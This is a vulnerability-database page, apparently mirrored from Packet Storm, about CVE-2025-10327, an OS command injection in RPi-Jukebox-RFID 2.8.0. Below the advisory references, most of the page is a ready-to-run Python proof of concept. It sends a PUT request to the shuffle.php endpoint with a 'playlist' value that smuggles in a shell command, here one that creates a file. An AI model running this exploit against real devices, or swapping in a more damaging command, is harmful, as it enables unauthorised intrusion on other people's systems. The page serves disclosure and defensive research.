Vulners
Lucene search
๐ RPi-Jukebox-RFID 2.8.0 Remote Code Execution
๐๏ธย 20 Jan 2026ย 00:00:00Reported byย Beatriz Fresno NaumovaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 112ย Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2025-10327 | 12 Sep 202523:17 | โ | circl |
 | RPi-Jukebox-RFID ๆไฝ็ณป็ปๅฝไปคๆณจๅ ฅๆผๆด | 12 Sep 202500:00 | โ | cnnvd |
 | CVE-2025-10327 | 12 Sep 202521:02 | โ | cve |
 | CVE-2025-10327 MiczFlor RPi-Jukebox-RFID shuffle.php os command injection | 12 Sep 202521:02 | โ | cvelist |
 | RPi-Jukebox-RFID 2.8.0 - Remote Command Execution | 17 Jan 202600:00 | โ | exploitdb |
 | EUVD-2025-29077 | 3 Oct 202520:07 | โ | euvd |
 | CVE-2025-10327 | 12 Sep 202521:15 | โ | nvd |
 | PT-2025-37354 | 12 Sep 202500:00 | โ | ptsecurity |
 | CVE-2025-10327 | 14 Sep 202522:31 | โ | redhatcve |
 | CVE-2025-10327 MiczFlor RPi-Jukebox-RFID shuffle.php os command injection | 12 Sep 202521:02 | โ | vulnrichment |
10
# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Remote Code Execution
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
# Version: 2.8.0
# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
# CVE: CVE-2025-10327
#
# Description:
# This PoC demonstrates an OS command injection vulnerability in the shuffle.php API endpoint.
# The vulnerable parameter "playlist" is passed directly to a shell command without sanitization,
# allowing an attacker to execute arbitrary system commands.
import requests
import json
# Replace this with the actual target IP or hostname
TARGET = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php"
# Payload to inject โ here we create a file as proof of execution
INJECTED_COMMAND = "test';touch rced_by_xu17.txt;echo '"
# JSON payload for the request
payload = {
"playlist": INJECTED_COMMAND,
"shuffle": "true"
}
# HTTP headers
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0"
}
def exploit():
print("[+] Sending malicious JSON payload to trigger command injection...")
try:
response = requests.put(TARGET, headers=headers, data=json.dumps(payload), timeout=5)
print(f"[+] HTTP Status Code: {response.status_code}")
print("[*] If the target is vulnerable, the command should be executed on the server.")
except Exception as e:
print(f"[-] Exploit failed: {e}")
if __name__ == "__main__":
exploit()Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Jan 2026 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 3.16.3 - 9.8
CVSS 45.3
CVSS 26.5
CVSS 36.3
EPSS0.03856
SSVC